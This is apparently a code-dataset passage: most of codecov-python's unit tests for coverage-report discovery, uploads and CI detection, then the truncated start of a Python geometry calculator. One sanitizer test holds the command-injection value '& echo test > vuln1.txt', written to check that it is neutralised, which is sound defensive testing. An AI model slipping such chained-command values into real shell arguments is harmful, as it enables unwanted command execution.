bool(codecov.ignored_path(\"/home/ubuntu/\" + path)),\n path + \" should be ignored\",\n )\n self.assertTrue(\n bool(codecov.ignored_path(\"/home/ubuntu/\" + path + \"/more paths\")),\n path + \" should be ignored\",\n )\n\n @data(\n \"coverage.xml\",\n \"jacoco.xml\",\n \"jacocoTestResults.xml\",\n \"coverage.txt\",\n \"gcov.lst\",\n \"cov.gcov\",\n \"info.lcov\",\n \"clover.xml\",\n \"cobertura.xml\",\n \"luacov.report.out\",\n \"gcov.info\",\n \"nosetests.xml\",\n )\n def test_is_report(self, path):\n self.assertFalse(\n bool(codecov.ignored_report(\"/home/file/\" + path)),\n path + \" should not be ignored\",\n )\n self.assertTrue(\n bool(codecov.is_report(\"/home/file/\" + path)), path + \" should be a report\"\n )\n\n @data(\n \".coverage.worker10\",\n \"coverage.jade\",\n \"include.lst\",\n \"inputFiles.lst\",\n \"createdFiles.lst\",\n \"scoverage.measurements.blackandwhite.xml\",\n \"test_hello_coverage.txt\",\n \"conftest_blackwhite.c.gcov\",\n )\n def test_ignore_report(self, path):\n self.assertTrue(\n 
bool(codecov.ignored_report(\"/home/file/\" + path)),\n path + \" should be ignored\",\n )\n\n def test_command(self):\n try:\n self.run_cli(True, \"--help\")\n except SystemExit as e:\n self.assertEqual(str(e), \"0\")\n else:\n raise Exception(\"help not shown\")\n\n def test_exits_0(self):\n try:\n sys.argv = [\"\"]\n codecov.main()\n except SystemExit as e:\n self.assertEqual(str(e), \"0\")\n else:\n raise Exception(\"did not exit\")\n\n def test_exits_1(self):\n try:\n sys.argv = [\"\"]\n codecov.main(\"--required\")\n except SystemExit as e:\n self.assertEqual(str(e), \"1\")\n else:\n raise Exception(\"did not exit\")\n\n @unittest.skipIf(\n os.getenv(\"CI\") == \"True\" and os.getenv(\"APPVEYOR\") == \"True\",\n \"Skip AppVeyor CI test\",\n )\n def test_returns_none(self):\n with patch(\"requests.post\") as post:\n with patch(\"requests.put\") as put:\n post.return_value = Mock(status_code=200, text=\"target\\ns3\")\n put.return_value = Mock(status_code=200)\n with open(self.filepath, \"w+\") as f:\n f.write(\"coverage data\")\n sys.argv = [\n \"\",\n \"--commit=8ed84d96bc225deff66605486180cd555366806b\",\n \"--branch=master\",\n \"--token=473c8c5b-10ee-4d83-86c6-bfd72a185a27\",\n ]\n self.assertEqual(codecov.main(), None)\n assert post.called and put.called\n\n @unittest.skipIf(\n os.getenv(\"CI\") == \"True\" and os.getenv(\"APPVEYOR\") == \"True\",\n \"Skip AppVeyor CI test\",\n )\n def test_send(self):\n with patch(\"requests.post\") as post:\n with patch(\"requests.put\") as put:\n post.return_value = Mock(status_code=200, text=\"target\\ns3\")\n put.return_value = Mock(status_code=200)\n with open(self.filepath, \"w+\") as f:\n f.write(\"coverage data\")\n res = self.run_cli(\n False, commit=\"a\" * 40, branch=\"master\", token=\"\"\n )\n self.assertEqual(res[\"result\"].strip(), \"target\")\n assert \"https://codecov.io/upload/v4?\" in post.call_args[0][0]\n assert (\n \"commit=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\"\n in post.call_args[0][0]\n )\n assert \"token=%3Ctoken%3E\" in post.call_args[0][0]\n assert \"branch=master\" in post.call_args[0][0]\n gzip_worker = zlib.decompressobj(zlib.MAX_WBITS | 16)\n reports = (\n gzip_worker.decompress(put.call_args[1][\"data\"])\n + gzip_worker.flush()\n )\n assert \"tests/test.py\".encode(\"utf-8\") in reports\n\n def test_send_error(self):\n with patch(\"requests.post\") as post:\n post.return_value = Mock(status_code=400, text=\"error\")\n with open(self.filepath, \"w+\") as f:\n f.write(\"coverage data\")\n try:\n self.run_cli(\n False, token=\"not-a-token\", commit=\"a\" * 40, branch=\"master\"\n )\n except Exception:\n pass\n else:\n raise Exception(\"400 never raised\")\n\n @unittest.skipIf(\n os.getenv(\"CI\") == \"True\" and os.getenv(\"APPVEYOR\") == \"True\",\n \"Skip AppVeyor CI test\",\n )\n def test_read_token_file(self):\n with open(self.token, \"w+\") as f:\n f.write(\"a\")\n with open(self.filepath, \"w+\") as f:\n f.write(\"coverage data\")\n res = self.run_cli(token=\"@\" + self.token, commit=\"a\", branch=\"b\")\n self.assertIn(\"token=a\", res[\"urlargs\"])\n\n def test_bowerrc(self):\n with open(self.bowerrc, \"w+\") as f:\n f.write('{\"directory\": \"tests\"}')\n with open(self.filepath, \"w+\") as f:\n f.write(\"coverage data\")\n try:\n self.run_cli(**self.defaults)\n except AssertionError as e:\n self.assertEqual(str(e), \"No coverage report found\")\n else:\n raise Exception(\"Did not raise AssertionError\")\n\n def test_disable_search(self):\n self.fake_report()\n try:\n self.run_cli(disable=\"search\", 
token=\"a\", branch=\"b\", commit=\"c\")\n except AssertionError as e:\n self.assertEqual(str(e), \"No coverage report found\")\n else:\n raise Exception(\"Did not raise AssertionError\")\n\n @unittest.skipIf(\n os.getenv(\"CI\") == \"True\" and os.getenv(\"APPVEYOR\") == \"True\",\n \"Skip AppVeyor CI test\",\n )\n def test_prefix(self):\n self.fake_report()\n res = self.run_cli(\n prefix=\"/foo/bar/\", dump=True, token=\"a\", branch=\"b\", commit=\"c\"\n )\n assert \"\\nfoo/bar/.gitignore\" in res[\"reports\"]\n\n def write_c(self):\n c = \"\\n\".join(\n (\n \"#include \",\n \"static int t = 1;\" \"int main()\",\n \"{\",\n \"if (t)\",\n 'printf(\"on this line\\\\n\");',\n \"else\",\n 'printf(\"but not here\\\\n\");',\n \"return 0;\",\n \"}\",\n )\n )\n with open(os.path.join(os.path.dirname(__file__), \"../hello.c\"), \"w+\") as f:\n f.write(c)\n codecov.try_to_run(\n [\"clang\", \"-coverage\", \"-O0\", \"hello.c\", \"-o\", \"hello\", \"&&\", \"./hello\"]\n )\n\n def test_disable_gcov(self):\n if self._env.get(\"TRAVIS\") == \"true\":\n self.write_c()\n try:\n self.run_cli(disable=\"gcov\", token=\"a\", branch=\"b\", commit=\"c\")\n except AssertionError as e:\n self.assertEqual(os.path.exists(\"hello.c.gcov\"), False)\n self.assertEqual(str(e), \"No coverage report found\")\n else:\n raise Exception(\"Did not raise AssertionError\")\n else:\n self.skipTest(\"Skipped, works on Travis only.\")\n\n def test_gcov(self):\n self.skipTest(\"Need to fix this test...\")\n # if self._env.get('TRAVIS') == 'true':\n # self.write_c()\n # output = self.run_cli(token='a', branch='b', commit='c')\n # self.assertEqual(os.path.exists('hello.c.gcov'), True)\n # report = output['reports'].split('<<<<<< network\\n')[1].splitlines()\n # self.assertIn('hello.c.gcov', report[0])\n # else:\n # self.skipTest(\"Skipped, works on Travis only.\")\n\n def test_disable_detect(self):\n self.set_env(\n JENKINS_URL=\"a\",\n GIT_BRANCH=\"b\",\n GIT_COMMIT=\"c\",\n CODECOV_TOKEN=\"d\",\n CODECOV_NAME=\"e\",\n )\n self.fake_report()\n try:\n self.run_cli(disable=\"detect\")\n except AssertionError as e:\n self.assertEqual(\n str(e), \"Commit sha is missing. 
Please specify via --commit=:sha\"\n )\n else:\n raise Exception(\"Did not raise AssertionError\")\n\n @unittest.skipIf(\n os.getenv(\"CI\") == \"True\" and os.getenv(\"APPVEYOR\") == \"True\",\n \"Skip AppVeyor CI test\",\n )\n def test_bowerrc_none(self):\n with open(self.bowerrc, \"w+\") as f:\n f.write('{\"other_key\": \"tests\"}')\n with open(self.filepath, \"w+\") as f:\n f.write(\"coverage data\")\n res = self.run_cli(**self.defaults)\n self.assertIn(\"tests/test.py\", res[\"reports\"])\n\n @unittest.skipIf(\n os.getenv(\"CI\") == \"True\" and os.getenv(\"APPVEYOR\") == \"True\",\n \"Skip AppVeyor CI test\",\n )\n def test_discovers(self):\n with open(self.jacoco, \"w+\") as f:\n f.write(\"\")\n with open(self.filepath, \"w+\") as f:\n f.write(\"coverage data\")\n res = self.run_cli(**self.defaults)\n self.assertIn(\"coverage.xml\", res[\"reports\"])\n self.assertIn(\"coverage data\", res[\"reports\"])\n self.assertIn(\"jacoco.xml\", res[\"reports\"])\n self.assertIn(\"\", res[\"reports\"])\n\n def test_not_jacoco(self):\n with open(self.filepath, \"w+\") as f:\n f.write(\"\")\n res = self.run_cli(file=\"tests/coverage.xml\", **self.defaults)\n res = res[\"reports\"].split(\"<<<<<< network\\n\")[1].splitlines()\n self.assertEqual(res[0], \"# path=tests/coverage.xml\")\n self.assertEqual(res[1], \"\")\n\n def test_run_coverage(self):\n self.skipTest(\"Not sure how to pull off atm\")\n with open(self.coverage, \"w+\") as f:\n f.write(pickle.dumps())\n res = self.run_cli(**self.defaults)\n self.assertIn('', res[\"reports\"])\n\n def test_run_coverage_fails(self):\n with open(self.coverage, \"w+\") as f:\n f.write(\"bad data\")\n try:\n self.run_cli(**self.defaults)\n except AssertionError as e:\n self.assertEqual(str(e), \"No coverage report found\")\n else:\n raise Exception(\"Did not raise AssertionError\")\n\n def test_include_env(self):\n self.set_env(HELLO=\"WORLD\")\n self.fake_report()\n res = self.run_cli(env=\"HELLO\", file=self.filepath, **self.defaults)\n self.assertIn(\"HELLO=WORLD\", res[\"reports\"])\n\n def test_none_found(self):\n try:\n self.run_cli(**self.defaults)\n except AssertionError as e:\n self.assertEqual(str(e), \"No coverage report found\")\n else:\n raise Exception(\"Did not raise AssertionError\")\n\n def test_sanitize_arg(self):\n self.assertEqual(\n codecov.sanitize_arg(\"\", \"& echo test > vuln1.txt\"),\n \" echo test > vuln1.txt\",\n )\n\n @unittest.skipUnless(os.getenv(\"JENKINS_URL\"), \"Skip Jenkins CI test\")\n def test_ci_jenkins(self):\n self.set_env(\n BUILD_URL=\"https://....\",\n JENKINS_URL=\"https://....\",\n GIT_BRANCH=\"master\",\n GIT_COMMIT=\"c739768fcac68144a3a6d82305b9c4106934d31a\",\n BUILD_NUMBER=\"41\",\n CODECOV_TOKEN=\"token\",\n CODECOV_NAME=\"name\",\n )\n self.fake_report()\n res = self.run_cli()\n self.assertEqual(res[\"query\"][\"service\"], \"jenkins\")\n self.assertEqual(\n res[\"query\"][\"commit\"], \"c739768fcac68144a3a6d82305b9c4106934d31a\"\n )\n self.assertEqual(res[\"query\"][\"build\"], \"41\")\n self.assertEqual(res[\"query\"][\"build_url\"], \"https://....\")\n self.assertEqual(res[\"query\"][\"pr\"], \"\")\n self.assertEqual(res[\"query\"][\"branch\"], \"master\")\n self.assertEqual(res[\"codecov\"].token, \"token\")\n self.assertEqual(res[\"codecov\"].name, \"name\")\n\n @unittest.skipUnless(os.getenv(\"JENKINS_URL\"), \"Skip Jenkins CI test\")\n def test_ci_jenkins_env(self):\n self.set_env(\n JENKINS_URL=\"https://....\",\n BUILD_URL=\"https://....\",\n ghprbSourceBranch=\"master\",\n 
ghprbActualCommit=\"c739768fcac68144a3a6d82305b9c4106934d31a\",\n ghprbPullId=\"1\",\n BUILD_NUMBER=\"41\",\n CODECOV_TOKEN=\"token\",\n CODECOV_NAME=\"name\",\n )\n self.fake_report()\n res = self.run_cli()\n self.assertEqual(res[\"query\"][\"service\"], \"jenkins\")\n self.assertEqual(\n res[\"query\"][\"commit\"], \"c739768fcac68144a3a6d82305b9c4106934d31a\"\n )\n self.assertEqual(res[\"query\"][\"build\"], \"41\")\n self.assertEqual(res[\"query\"][\"build_url\"], \"https://....\")\n self.assertEqual(res[\"query\"][\"pr\"], \"1\")\n self.assertEqual(res[\"query\"][\"branch\"], \"master\")\n self.assertEqual(res[\"codecov\"].token, \"token\")\n self.assertEqual(res[\"codecov\"].name, \"name\")\n\n @unittest.skipUnless(os.getenv(\"JENKINS_URL\"), \"Skip Jenkins CI test\")\n def test_ci_jenkins_blue_ocean(self):\n self.set_env(\n JENKINS_URL=\"https://....\",\n BUILD_URL=\"https://....\",\n BRANCH_NAME=\"master\",\n CHANGE_ID=\"1\",\n BUILD_NUMBER=\"41\",\n CODECOV_TOKEN=\"token\",\n CODECOV_NAME=\"name\",\n )\n self.fake_report()\n res = self.run_cli()\n self.assertEqual(res[\"query\"][\"service\"], \"jenkins\")\n self.assertEqual(\n res[\"query\"][\"commit\"], codecov.check_output((\"git\", \"rev-parse\", \"HEAD\"))\n )\n self.assertEqual(res[\"query\"][\"build\"], \"41\")\n self.assertEqual(res[\"query\"][\"build_url\"], \"https://....\")\n self.assertEqual(res[\"query\"][\"pr\"], \"1\")\n self.assertEqual(res[\"query\"][\"branch\"], \"master\")\n self.assertEqual(res[\"codecov\"].token, \"token\")\n self.assertEqual(res[\"codecov\"].name, \"name\")\n\n @unittest.skipUnless(\n os.getenv(\"CI\") == \"true\"\n and os.getenv(\"TRAVIS\") == \"true\"\n and os.getenv(\"SHIPPABLE\") != \"true\",\n \"Skip Travis CI test\",\n )\n def test_ci_travis(self):\n self.set_env(\n TRAVIS=\"true\",\n TRAVIS_BRANCH=\"master\",\n TRAVIS_COMMIT=\"c739768fcac68144a3a6d82305b9c4106934d31a\",\n TRAVIS_REPO_SLUG=\"owner/repo\",\n TRAVIS_JOB_ID=\"33116958\",\n TRAVIS_TAG=\"v1.1.1\",\n TRAVIS_JOB_NUMBER=\"4.1\",\n )\n self.fake_report()\n res = self.run_cli()\n self.assertEqual(res[\"query\"][\"service\"], \"travis\")\n self.assertEqual(\n res[\"query\"][\"commit\"], \"c739768fcac68144a3a6d82305b9c4106934d31a\"\n )\n self.assertEqual(res[\"query\"][\"build\"], \"4.1\")\n self.assertEqual(res[\"query\"][\"pr\"], \"\")\n self.assertEqual(res[\"query\"][\"tag\"], \"v1.1.1\")\n self.assertEqual(res[\"query\"][\"slug\"], \"owner/repo\")\n self.assertEqual(res[\"query\"][\"branch\"], \"master\")\n self.assertEqual(res[\"codecov\"].token, \"\")\n\n @unittest.skipUnless(\n os.getenv(\"CI\") == \"true\" and os.getenv(\"CI_NAME\") == \"codeship\",\n \"Skip Codeship CI test\",\n )\n def test_ci_codeship(self):\n self.set_env(\n CI_NAME=\"codeship\",\n CI_BRANCH=\"master\",\n CI_BUILD_NUMBER=\"20\",\n CI_BUILD_URL=\"https://codeship.io/build/1\",\n CI_COMMIT_ID=\"743b04806ea677403aa2ff26c6bdeb85005de658\",\n CODECOV_TOKEN=\"token\",\n CODECOV_NAME=\"name\",\n )\n self.fake_report()\n res = self.run_cli()\n self.assertEqual(res[\"query\"][\"service\"], \"codeship\")\n self.assertEqual(\n res[\"query\"][\"commit\"], \"743b04806ea677403aa2ff26c6bdeb85005de658\"\n )\n self.assertEqual(res[\"query\"][\"build\"], \"20\")\n self.assertEqual(res[\"query\"][\"build_url\"], \"https://codeship.io/build/1\")\n self.assertEqual(res[\"query\"][\"pr\"], \"\")\n self.assertEqual(res[\"query\"][\"branch\"], \"master\")\n self.assertEqual(res[\"codecov\"].token, \"token\")\n self.assertEqual(res[\"codecov\"].name, \"name\")\n\n 
@unittest.skipUnless(\n os.getenv(\"CI\") == \"true\" and os.getenv(\"CIRCLECI\") == \"true\",\n \"Skip Circle CI test\",\n )\n def test_ci_circleci(self):\n self.set_env(\n CIRCLECI=\"true\",\n CIRCLE_BUILD_NUM=\"57\",\n CIRCLE_NODE_INDEX=\"1\",\n CIRCLE_PR_NUMBER=\"1\",\n CIRCLE_BRANCH=\"master\",\n CIRCLE_PROJECT_USERNAME=\"owner\",\n CIRCLE_PROJECT_REPONAME=\"repo\",\n CIRCLE_SHA1=\"d653b934ed59c1a785cc1cc79d08c9aaa4eba73b\",\n )\n self.fake_report()\n res = self.run_cli()\n self.assertEqual(res[\"query\"][\"service\"], \"circleci\")\n self.assertEqual(\n res[\"query\"][\"commit\"], \"d653b934ed59c1a785cc1cc79d08c9aaa4eba73b\"\n )\n self.assertEqual(res[\"query\"][\"build\"], \"57.1\")\n self.assertEqual(res[\"query\"][\"pr\"], \"1\")\n self.assertEqual(res[\"query\"][\"slug\"], \"owner/repo\")\n self.assertEqual(res[\"query\"][\"branch\"], \"master\")\n\n @unittest.skipUnless(\n os.getenv(\"CI\") == \"true\" and os.getenv(\"BUILDKITE\") == \"true\",\n \"Skip BuildKit CI test\",\n )\n def test_ci_buildkite(self):\n self.set_env(\n CI=\"true\",\n BUILDKITE=\"true\",\n BUILDKITE_BUILD_NUMBER=\"57\",\n BUILDKITE_JOB_ID=\"1\",\n BUILDKITE_BRANCH=\"master\",\n BUILDKITE_PROJECT_SLUG=\"owner/repo\",\n BUILDKITE_COMMIT=\"d653b934ed59c1a785cc1cc79d08c9aaa4eba73b\",\n CODECOV_TOKEN=\"token\",\n CODECOV_NAME=\"name\",\n )\n self.fake_report()\n res = self.run_cli()\n self.assertEqual(res[\"query\"][\"service\"], \"buildkite\")\n self.assertEqual(\n res[\"query\"][\"commit\"], \"d653b934ed59c1a785cc1cc79d08c9aaa4eba73b\"\n )\n self.assertEqual(res[\"query\"][\"build\"], \"57.1\")\n self.assertEqual(res[\"query\"][\"slug\"], \"owner/repo\")\n self.assertEqual(res[\"query\"][\"branch\"], \"master\")\n self.assertEqual(res[\"codecov\"].token, \"token\")\n self.assertEqual(res[\"codecov\"].name, \"name\")\n\n @unittest.skipUnless(\n os.getenv(\"CI\") == \"true\" and os.getenv(\"SEMAPHORE\") == \"true\",\n \"Skip Semaphore CI test\",\n )\n def test_ci_semaphore(self):\n self.set_env(\n SEMAPHORE=\"true\",\n BRANCH_NAME=\"master\",\n SEMAPHORE_BUILD_NUMBER=\"10\",\n SEMAPHORE_CURRENT_THREAD=\"1\",\n SEMAPHORE_REPO_SLUG=\"owner/repo\",\n REVISION=\"743b04806ea677403aa2ff26c6bdeb85005de658\",\n CODECOV_TOKEN=\"token\",\n CODECOV_NAME=\"name\",\n )\n self.fake_report()\n res = self.run_cli()\n self.assertEqual(res[\"query\"][\"service\"], \"semaphore\")\n self.assertEqual(\n res[\"query\"][\"commit\"], \"743b04806ea677403aa2ff26c6bdeb85005de658\"\n )\n self.assertEqual(res[\"query\"][\"build\"], \"10.1\")\n self.assertEqual(res[\"query\"][\"slug\"], \"owner/repo\")\n self.assertEqual(res[\"query\"][\"branch\"], \"master\")\n\n @unittest.skipUnless(\n os.getenv(\"CI\") == \"drone\" and os.getenv(\"DRONE\") == \"true\",\n \"Skip Drone CI test\",\n )\n def test_ci_drone(self):\n self.set_env(\n CI=\"drone\",\n DRONE=\"true\",\n DRONE_BUILD_NUMBER=\"10\",\n DRONE_BRANCH=\"master\",\n DRONE_BUILD_LINK=\"https://drone.io/github/builds/1\",\n CODECOV_TOKEN=\"token\",\n CODECOV_NAME=\"name\",\n )\n self.fake_report()\n res = self.run_cli()\n self.assertEqual(res[\"query\"][\"service\"], \"drone.io\")\n self.assertEqual(\n res[\"query\"][\"commit\"], codecov.check_output((\"git\", \"rev-parse\", \"HEAD\"))\n )\n self.assertEqual(res[\"query\"][\"build\"], \"10\")\n self.assertEqual(res[\"query\"][\"build_url\"], \"https://drone.io/github/builds/1\")\n self.assertEqual(res[\"codecov\"].token, \"token\")\n self.assertEqual(res[\"codecov\"].name, \"name\")\n\n @unittest.skipUnless(os.getenv(\"SHIPPABLE\") == 
\"true\", \"Skip Shippable CI test\")\n def test_ci_shippable(self):\n self.set_env(\n SHIPPABLE=\"true\",\n BUILD_NUMBER=\"10\",\n REPO_NAME=\"owner/repo\",\n BRANCH=\"master\",\n BUILD_URL=\"https://shippable.com/...\",\n COMMIT=\"743b04806ea677403aa2ff26c6bdeb85005de658\",\n CODECOV_TOKEN=\"token\",\n CODECOV_NAME=\"name\",\n )\n self.fake_report()\n res = self.run_cli()\n self.assertEqual(res[\"query\"][\"service\"], \"shippable\")\n self.assertEqual(\n res[\"query\"][\"commit\"], \"743b04806ea677403aa2ff26c6bdeb85005de658\"\n )\n self.assertEqual(res[\"query\"][\"build\"], \"10\")\n self.assertEqual(res[\"query\"][\"slug\"], \"owner/repo\")\n self.assertEqual(res[\"query\"][\"build_url\"], \"https://shippable.com/...\")\n self.assertEqual(res[\"codecov\"].token, \"token\")\n self.assertEqual(res[\"codecov\"].name, \"name\")\n\n # @unittest.skipUnless(os.getenv('CI') == \"True\" and os.getenv('APPVEYOR') == 'True', 'Skip AppVeyor CI test')\n @unittest.skip(\"Skip AppVeyor test\")\n def test_ci_appveyor(self):\n self.set_env(\n APPVEYOR=\"True\",\n CI=\"True\",\n APPVEYOR_JOB_ID=\"9r2qufuu8\",\n APPVEYOR_BUILD_VERSION=\"1.2.3\",\n APPVEYOR_ACCOUNT_NAME=\"owner\",\n APPVEYOR_PROJECT_SLUG=\"repo\",\n APPVEYOR_PULL_REQUEST_NUMBER=\"1\",\n APPVEYOR_REPO_BRANCH=\"master\",\n APPVEYOR_REPO_NAME=\"owner/repo\",\n APPVEYOR_REPO_COMMIT=\"d653b934ed59c1a785cc1cc79d08c9aaa4eba73b\",\n CODECOV_TOKEN=\"token\",\n CODECOV_NAME=\"name\",\n )\n self.fake_report()\n res = self.run_cli(file=self.filepath)\n self.assertEqual(res[\"query\"][\"service\"], \"appveyor\")\n self.assertEqual(\n res[\"query\"][\"commit\"], \"d653b934ed59c1a785cc1cc79d08c9aaa4eba73b\"\n )\n self.assertEqual(res[\"query\"][\"job\"], \"owner/repo/1.2.3\")\n self.assertEqual(res[\"query\"][\"build\"], \"9r2qufuu8\")\n self.assertEqual(res[\"query\"][\"slug\"], \"owner/repo\")\n self.assertEqual(res[\"query\"][\"pr\"], \"1\")\n self.assertEqual(res[\"codecov\"].token, \"token\")\n self.assertEqual(res[\"codecov\"].name, \"name\")\n\n @unittest.skipUnless(\n os.getenv(\"CI\") == \"true\" and os.getenv(\"WERCKER_GIT_BRANCH\"),\n \"Skip Wercker CI test\",\n )\n def test_ci_wercker(self):\n self.set_env(\n WERCKER_GIT_BRANCH=\"master\",\n WERCKER_MAIN_PIPELINE_STARTED=\"1399372237\",\n WERCKER_GIT_OWNER=\"owner\",\n WERCKER_GIT_REPOSITORY=\"repo\",\n WERCKER_GIT_COMMIT=\"d653b934ed59c1a785cc1cc79d08c9aaa4eba73b\",\n CODECOV_TOKEN=\"token\",\n CODECOV_NAME=\"name\",\n )\n self.fake_report()\n res = self.run_cli()\n self.assertEqual(res[\"query\"][\"service\"], \"wercker\")\n self.assertEqual(\n res[\"query\"][\"commit\"], \"d653b934ed59c1a785cc1cc79d08c9aaa4eba73b\"\n )\n self.assertEqual(res[\"query\"][\"build\"], \"1399372237\")\n self.assertEqual(res[\"query\"][\"slug\"], \"owner/repo\")\n self.assertEqual(res[\"codecov\"].token, \"token\")\n self.assertEqual(res[\"codecov\"].name, \"name\")\n\n @unittest.skipUnless(\n os.getenv(\"CI\") == \"true\" and os.getenv(\"MAGNUM\") == \"true\",\n \"Skip Magnum CI test\",\n )\n def test_ci_magnum(self):\n self.set_env(\n CI_BRANCH=\"master\",\n CI_BUILD_NUMBER=\"1399372237\",\n MAGNUM=\"true\",\n CI=\"true\",\n CI_COMMIT=\"d653b934ed59c1a785cc1cc79d08c9aaa4eba73b\",\n CODECOV_TOKEN=\"token\",\n CODECOV_NAME=\"name\",\n )\n self.fake_report()\n res = self.run_cli()\n self.assertEqual(res[\"query\"][\"service\"], \"magnum\")\n self.assertEqual(\n res[\"query\"][\"commit\"], \"d653b934ed59c1a785cc1cc79d08c9aaa4eba73b\"\n )\n self.assertEqual(res[\"query\"][\"build\"], \"1399372237\")\n 
self.assertEqual(res[\"codecov\"].token, \"token\")\n self.assertEqual(res[\"codecov\"].name, \"name\")\n\n @unittest.skipUnless(\n os.getenv(\"CI_SERVER_NAME\", \"\").startswith(\"GitLab\"), \"Skip GitLab CI test\"\n )\n def test_ci_gitlab_pre9(self):\n self.set_env(\n CI_BUILD_REF_NAME=\"master\",\n CI_BUILD_ID=\"1399372237\",\n CI_BUILD_REPO=\"https://gitlab.com/owner/repo.git\",\n CI_SERVER_NAME=\"GitLab CI\",\n CI_BUILD_REF=\"d653b934ed59c1a785cc1cc79d08c9aaa4eba73b\",\n HOME=\"/\",\n CI_PROJECT_DIR=os.getcwd().strip(\"/\"),\n CODECOV_TOKEN=\"token\",\n CODECOV_NAME=\"name\",\n )\n self.fake_report()\n res = self.run_cli()\n self.assertEqual(res[\"query\"][\"service\"], \"gitlab\")\n self.assertEqual(\n res[\"query\"][\"commit\"], \"d653b934ed59c1a785cc1cc79d08c9aaa4eba73b\"\n )\n self.assertEqual(res[\"query\"][\"build\"], \"1399372237\")\n self.assertEqual(res[\"query\"][\"slug\"], \"owner/repo\")\n self.assertEqual(res[\"codecov\"].token, \"token\")\n self.assertEqual(res[\"codecov\"].name, \"name\")\n\n @unittest.skipUnless(\n os.getenv(\"CI_SERVER_NAME\", \"\").startswith(\"GitLab\"), \"Skip GitLab CI test\"\n )\n def test_ci_gitlab(self):\n self.set_env(\n CI_COMMIT_REF_NAME=\"master\",\n CI_JOB_ID=\"1399372237\",\n CI_REPOSITORY_URL=\"https://gitlab.com/owner/repo.git\",\n CI_SERVER_NAME=\"GitLab CI\",\n CI_COMMIT_SHA=\"d653b934ed59c1a785cc1cc79d08c9aaa4eba73b\",\n HOME=\"/\",\n CI_PROJECT_DIR=os.getcwd().strip(\"/\"),\n CODECOV_TOKEN=\"token\",\n CODECOV_NAME=\"name\",\n )\n self.fake_report()\n res = self.run_cli()\n self.assertEqual(res[\"query\"][\"service\"], \"gitlab\")\n self.assertEqual(\n res[\"query\"][\"commit\"], \"d653b934ed59c1a785cc1cc79d08c9aaa4eba73b\"\n )\n self.assertEqual(res[\"query\"][\"build\"], \"1399372237\")\n self.assertEqual(res[\"query\"][\"slug\"], \"owner/repo\")\n self.assertEqual(res[\"codecov\"].token, \"token\")\n self.assertEqual(res[\"codecov\"].name, \"name\")\n\n @unittest.skipUnless(\n os.getenv(\"CI\") == \"true\" and os.getenv(\"GITHUB_ACTION\"),\n \"Skip GitHub Actions CI test\",\n )\n def test_ci_github(self):\n self.set_env(\n HOME=\"/\",\n CODECOV_TOKEN=\"token\",\n CODECOV_NAME=\"name\",\n )\n self.fake_report()\n res = self.run_cli()\n self.assertEqual(res[\"query\"][\"service\"], \"github-actions\")\n self.assertEqual(res[\"query\"][\"commit\"], os.getenv(\"GITHUB_SHA\"))\n self.assertEqual(res[\"query\"][\"build\"], os.getenv(\"GITHUB_RUN_ID\"))\n self.assertEqual(res[\"query\"][\"slug\"], os.getenv(\"GITHUB_REPOSITORY\"))\n self.assertEqual(res[\"codecov\"].token, \"token\")\n self.assertEqual(res[\"codecov\"].name, \"name\")\n\n @unittest.skipUnless(\n os.getenv(\"CI\") == \"true\" and os.getenv(\"CIRRUS_CI\") == \"true\",\n \"Skip Cirrus CI\",\n )\n def test_ci_cirrus(self):\n # The data used in this test follows the test case data in\n # https://github.com/codecov/codecov-bash/pull/127\n # Discussion about using codecov without token for Cirrus CI can be seen in:\n # https://community.codecov.com/t/add-support-of-uploading-from-cirrus-ci-without-token/1028/36\n self.set_env(\n HOME=\"/\",\n CIRRUS_CI=\"true\",\n CIRRUS_REPO_FULL_NAME=\"codecov/ci-repo\",\n CIRRUS_BRANCH=\"master\",\n CIRRUS_PR=\"1\",\n CIRRUS_CHANGE_IN_REPO=\"180c0d097354fc1a451da8a3be5aba255f2ffd9f\",\n CIRRUS_BUILD_ID=\"777\",\n CIRRUS_TASK_ID=\"239\",\n CIRRUS_TASK_NAME=\"test\"\n )\n self.fake_report()\n res = self.run_cli()\n self.assertEqual(res[\"query\"][\"service\"], \"cirrus-ci\")\n self.assertEqual(res[\"query\"][\"slug\"], \"codecov/ci-repo\")\n 
self.assertEqual(res[\"query\"][\"branch\"], \"master\")\n self.assertEqual(res[\"query\"][\"pr\"], \"1\")\n self.assertEqual(res[\"query\"][\"commit\"], os.getenv(\"CIRRUS_CHANGE_IN_REPO\"))\n self.assertEqual(res[\"query\"][\"build\"], \"777\")\n self.assertEqual(res[\"query\"][\"build_url\"], \"https://cirrus-ci.com/task/239\")\n self.assertEqual(res[\"query\"][\"job\"], \"test\")\n\n @unittest.skip(\"Skip CI None\")\n def test_ci_none(self):\n self.set_env(CODECOV_TOKEN=\"token\", CODECOV_NAME=\"name\")\n self.fake_report()\n res = self.run_cli(\n build=10,\n commit=\"d653b934ed59c1a785cc1cc79d08c9aaa4eba73b\",\n slug=\"owner/repo\",\n token=\"token\",\n )\n self.assertEqual(res[\"query\"].get(\"service\"), None)\n self.assertEqual(\n res[\"query\"][\"commit\"], \"d653b934ed59c1a785cc1cc79d08c9aaa4eba73b\"\n )\n self.assertEqual(res[\"query\"][\"build\"], \"10\")\n self.assertEqual(res[\"query\"][\"slug\"], \"owner/repo\")\n self.assertEqual(res[\"codecov\"].token, \"token\")\n self.assertEqual(res[\"codecov\"].name, \"name\")\n","repo_name":"codecov/codecov-python","sub_path":"tests/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":33982,"program_lang":"python","lang":"en","doc_type":"code","stars":185,"dataset":"github-code","pt":"5"} +{"seq_id":"1732213166","text":"from bangundatar import rumusLuas_Persegi, rumusKeliling_Persegi, rumusLuas_PersegiPanjang, rumusKeliling_PersegiPanjang, rumusLuas_Segitiga, rumusKeliling_Segitiga, rumusLuas_Lingkaran, rumusKeliling_Lingkaran\ndef persegi():\n print(\"1. Luas persegi\")\n print(\"2. Keliling persegi\")\n pilihan = input(\"Masukkan Rumus yang akan anda gunakan: \")\n while True:\n if pilihan == \"1\":\n rumusLuas_Persegi()\n break\n elif pilihan == \"2\":\n rumusKeliling_Persegi()\n break\n else:\n pilihan= input(\"Maaf, pilihan anda tidak tersedia. Pilih Kembali: \")\n\ndef persegi_panjang():\n print(\"1. Luas persegi Panjang\")\n print(\"2. Keliling persegi Panjang\")\n pilihan = input(\"Masukkan Rumus yang akan anda gunakan: \")\n while True:\n if pilihan == \"1\":\n rumusLuas_PersegiPanjang()\n break\n elif pilihan == \"2\":\n rumusKeliling_PersegiPanjang()\n break\n else:\n pilihan= input(\"Maaf, pilihan anda tidak tersedia. 